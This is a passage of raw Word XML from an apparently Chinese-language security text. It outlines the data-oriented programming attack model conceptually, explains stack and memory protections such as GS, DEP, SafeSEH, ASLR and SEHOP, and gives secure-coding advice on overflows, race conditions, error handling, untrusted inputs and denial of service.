    <w:p w14:paraId="62D1C87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（3）要完成攻击目的，dispatcher内当然要有各种需要的gadgets，根据需要运行不同的gadgets序列完成特定功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2504DFA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在找到了具有以上特征的代码区后，要想完成攻击，首先要掌握</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序中数据结构相关的内存地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，以便可以正确的覆盖特定变量。如果随机化防护开启，还需要泄露某特定变量的内存地址来计算其它变量的地址。至此，DOP的攻击模型已经大概清楚了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47055373"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6EC7F9FB" wp14:editId="08CDF518">
            <wp:extent cx="4313949" cy="1469319"/>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36">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4334066" cy="1476171"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F42B0" w14:textId="1A4AA3B9"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w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DOP攻击模型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8E209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那么随之而来的就是完成DOP攻击所需要攻克的难题：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如何定位gadgets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如何寻找</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dispatcher？如何完成</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gadgets的拼接</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>达到攻击目的？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66854C1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定位gadgets之前首先要了解gadgets的特点：一个gadget一般包含3个指令：加载数据，运算（复制、加、减、乘、除、加载等）、存储数据；dispatcher要包含溢出漏洞，且可控制；如何通过特定的输入去拼接gadgets，需要人工验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C43B1D"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2.7.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>防御机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C829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iOS、Linux、Windows等系统下分别采用了各种相同或不同的防御机制来针对缓冲区溢出的攻击，比如：Windows采用的GS栈溢出保护机制和DEP数据不可执行的保护机制（Linux采用的是NX保护机制），以及SafeSEH和SEHOP来检查SEH是否被覆盖；以及iOS、Linux。WIndows都采用的ALSR地址随机化机制，接下来简单介绍一些防御机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CA46B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（1）GS防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5007203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 xml:space="preserve">在函数调用时向栈中压入一个随机的4字节的数字，通常在EBP之上，并且会将其副本填入到只读的数据段中，在函数返回前，会检查栈中的随机数字是否还与数据段中的值一致，如果不一致，就是发生了栈溢出攻击，抛出异常，终止程序。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6A9F2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应用了GS防御后会增加二进制程序的大小，并对程序的性能也产生了较大的影响，所以很多程序为了自身的表现良好，不会采用这种防御机制。并且，这种防御机制在缓冲区溢出时没有覆盖到EBP之后的情况下，起不到检测效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6167E96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（2）DEP防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72705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这是一种针对栈中代码植入的防御，栈中本应该是数据，所以不可能是可以执行的二进制代码，所以对栈所属的那片内存空间设置为读写权限，不允许执行非常合理，而这实现起来也较为简单，可以通过硬件实现DEP，防止标记为数据区的内存执行代码，这个防御机制对性能的影响不大，所以现如今几乎所有的程序都使用了这种保护机制，代码植入的攻击方式几乎不再可用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434C4B2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（3）SafeSEH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB6AE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SafeSEH的基本原理很简单，在编译器生成二进制IMAGE的时候，把所有合法的SEH函数的地址解析出来，在IMAGE里生成一张合法的SEH函数表，用于异常处理时候进行严格的匹配检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在调用异常处理函数之前，对要调用的异常处理函数进行一系列的有效性校验，如果发现异常处理函数不可靠（被覆盖了，被篡改了），立即终止异常处理函数的调用。不过SafeSEH需要编译器和系统双重支持，缺少一个则保护能力基本就丧失了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427052E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（4）ALSR随机化机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A28D92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在加载程序时，可以对除了代码段和数据段的其它所有段进行地址随机化，那么当程序成功加载后，动态链接库中的函数的具体地址，栈空间的地址区间，堆空间的地址空间都是不可预知的，那么ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>libc和ROP这种需要目标代码地址的攻击就会困难很多。PIE随机化会将代码段和数据段也加入到随机化过程中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1FB5B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虽然随机化机制使得代码地址发生了改变，但是某行代码相对于自己所属段的基地址却是不会变的。如果可以泄露出libc的基地址和libc的版本，那么仍然可以轻松得到某个函数的具体地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2789F8D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（5）SEHOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731BB95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一种SEH覆盖保护机制，可以检测SEH的完整性。大家都知道SEH是一个链表，每个链表中都有：指向异常处理函数的地址和指向下一个SEH结构的指针，并且最后一个SEH结构中是一个默认的异常处理函数的地址和结束标志。这个异常处理函数是固定的，用于处理之前的函数都不能处理的异常，如果SEH被恶意覆盖，这个SEH链几乎一定会被破坏，那么链的最后一项就不再是这个默认的异常处理函数了，SEHOP正是利用了这一特点进行防御的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A19CF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SEHOP的核心任务就是在程序转入异常处理函数之前，检查SEH链上最后一个异常处理函数还是不是系统固定的默认处理函数，如果不是，则可能发生了SEH覆盖，终止程序，不再执行下去。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180F744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防护机制的加入会让程序的性能降低，为了减少防护机制对程序的影响，一些简单的防御如DEP由硬件来支持（ARM、intel、AMD等大多数芯片如今都支持），在执行代码时，硬件会检查要执行的代码是在数据区还是在代码区，从而决定是执行还是报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ED1C71"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2.7</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A68E18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不能总是依赖于防御机制来提高软件的安全性，在编写软件时就应该注意避免出现各种各样的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A201DF" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="562E7019" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>防范缓冲区溢出主要有以下四种方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8F4FB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（1）避免使用危险函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF2EBA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C语言库中每一个不带有长度参数的串操作函数，都有与其对应的带有长度参数的函数，应该尽可能地使用这些“更安全”的函数,或者使用自己封装的安全函数，也可以使用其他安全函数库提供的安全函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0446AE3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（2）检查数据长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26968AA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要在本地应用程序上验证所有的用户输入，首先要确保输入字符串的长度是有效的。假设程序设计的是接受50个文本字符的输入，并将它们添加到数据库里。如果用户输入75个字符，那么输入就超出了数据库可以容纳的字符，程序将进入非正常运行状态。因此，用户的输入应该这样设计:在用户输入文本字符串时，先将该字符串的长度同最大允许长度进行比较，拦截超过允许最大长度的输入字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785259F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（3）使用安全函数或函数库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A518FF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不使用C或C++语言中存在缓冲区溢出问题的函数，改用一些更安全的函数，如使用strcpy_s() 代替strcpy()。此外，也可以使用一些知名的底层库来代替使用C/C+ +语言提供的基础库，如采用Libmib、libsafe等 ，这些库提供了一些更为安全的基础函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760D356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（4）其他防范措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C754A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使用栈保护方法也可以在一定程度上防御缓冲区溢出。微软Visual Studio中通过/GS编译开关实现了栈保护技术。非执行堆栈技术也能够对攻击起到较好的防御作用，会对应用程序的兼容性产生一定影响，Solar</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Designer的non-exec补丁(由OpenWall使用)和exec shield (由RedHat/Fedora使用) 都是实现的这种技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4106DA57" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF30F73" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>防范整数溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA4926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当一个整数值大于或者小于其范围时，就会产生整数溢出。因为所有内置整数类型(如char，short，int，long等)都使用某个固定长度的内存空间来装载和表示，所以其表示范围有限。当值超出最大或最小范围时，就会“回绕”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D92762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避免整数溢出的最好方法是，检验所有的整数输入是否都位于上下界范围内。上下界的选择应当使得任何后续计算结果都不会超出所使用变量的容量限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CAA69A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处理竞争条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5766613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进程是程序在计算机上的一次执行活动，运行一个程序就相当于启动了一个进程。线程是进程中的一个实体，是被系统独立调度和分派的基本单位，同一进程中可以有多个线程。线程只拥有运行时必不可少的资源(如程序计数器、一组寄存器和栈)，但是它可与同属一个进程的其他线程共享进程所拥有的全部资源。一个线程可以创建和撤销另一个线程，同一个进程中的多个线程之间可以并发执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAD9F1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处理线程或者进程时经常面临竞争条件问题，即当多个进程或者线程读写数据时，数据的处理结果依赖于多个进程的指令实际执行顺序，如果代码编写不当，有可能造成每次运行程序得到不同的结果，甚至每次运行结果都不正确。假设有两个进程P1和P2共享了变量a。按照代码逻辑，在某一时刻，P1更新a为1，在另一时刻，P2更新a为2。这里，进程P1和P2就是竞争地写变量a，而变量a的最终值取决于这两个进程的执行先后顺序，是不固定的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD93E4" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BDF7DCC" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正确的处理异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E9F17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软件在实际运行过程中会碰到各种情况，每次运行时操作系统内存分配情况不同，系统资源分配不同，用户输入也存在差异，同时存在的其他进程也不尽相同。在面临这些不同情况时，软件可能会因为某个条件不满足而中断正常处理流程，这就是异常现象。软件应当提供异常安全处理代码，使其能检测出各种异常，并处理各种可能的运行路径，保证程序总能“正确”的运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E26EA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不提供异常处理代码的软件程序可能会在异常发生的时候停止运行，严重的甚至可能引发安全问题。程序中的异常或错误处理是程序编码中常常碰到的问题，不安全的异常处理或错误轻则造成信息泄露，重则可以造成系统宕机、数据丢失。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBCBF0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最后给出一些通用异常处理的编码建议：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF899C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不要在错误响应中泄露敏感信息，包括系统的详细信息、会话标识符或者账号信息；（2）使用错误处理以避免显示调试或堆栈跟踪信息；（3）使用通用的错误消息并使用定制的错误页面；（4）应用程序应当处理应用程序错误，并且不依赖服务器配置；（5）当错误条件发生时，适当清空分配的内存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282F356A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3620F51B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>防范交互参数安全问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2967DF3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输入操作是软件和用户之间的交互操作，软件程序和环境变量、用户之间经常需要交互数据，对这些交互数据进行安全检查也是十分必要的，本小节主要讨论传统方式的交互数据，包括环境变量、文件和命令行参数等。Web应用中的SQL注入、XSS等问题将会在Web应用安全一节来详细介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EBACC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（1）环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C50400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环境变量是shell中的变量，在shell下运行的软件进程都可以访问和使用环境变量。对于软件开发人员来讲，常常容易认为环境变量是操作系统层面设置的变量，所以是可信的，从而忽视对其的验证。而一旦环境变量作为软件的输入，则有因为长度过长、默认内容被篡改、格式不符、植入恶意字符等原因导致软件进程出现安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB568C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为了保证安全使用环境变量，系统管理员和程序开发员可采取限制环境变量的使用权限、加强对环境变量值的检查等手段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63811CB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（2）文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3684F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软件进程也常常会获取外部文件名，或者读取文件内容，对于这些文件名和文件内容也应进行检查,因为攻击者有可能利用文件名和文件内容来进行攻击。编程时可以参考以下安全措施。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25971F2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一是不要信任可以被攻击者设置的文件名。Linux和UNIX允许使用任意字符序列作为文件名，使用一个输入的目录或者接受一个外部提供的文件名时应加以检查，如仔细检查和防止含有“&amp;”等特殊字符的文件名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319373C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二是不要信任可以被不可信用户控制的文件内容，如浏览或编辑由攻击者发送来的文件。有些攻击者可以通过在文件中预先插入特定内容或经过特殊编码字符插入到文件中，而目标用户使用特定软件打开或者编辑该文件时，就可能执行那些恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CDC49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三是避免从当前目录中获得配置信息，因为用户进程可能会浏览一个由攻击者控制的目录，如果攻击者在该目录中创建了一个恶意配置文件，则可能诱导用户进程执行恶意代码。如果必须从当前目录中得到配置信息，就要严格检查其所得到的所有数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FB447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四是不要让攻击者控制任何临时文件。如果一个用户是可信的，可以将临时目录放在该用户的主目录下，也可以采用其他安全的方法创建和使用临时文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727DABB8"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（3）命令行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A31A33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软件进程启动时可以接受来自命令行的数据，但是要确保这些数据可信，对于具有setuid/setgid特性的软件进程尤其需要关注。对于软件进程来说，对命令行数据的检查包括参数的数量、格式、长度以及内容等方面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4F21B7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FCD2DD1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>防范拒绝服务攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D63779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拒绝服务攻击是一种常见的攻击形式，其目的是使目标应用系统无法提供正常的服务，内存不足、带宽不足、特定资源消耗管理不善等原因都可能引起拒绝服务攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF3BA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为避免因占用系统过多内存而导致的拒绝服务攻击，除非可以肯定连接的另一端是真实的客户端，否则不要为用户分配较大的内存空间，不要让攻击者轻易实施可导致系统较高开销的操作。</w:t>
      </w:r>
    </w:p>
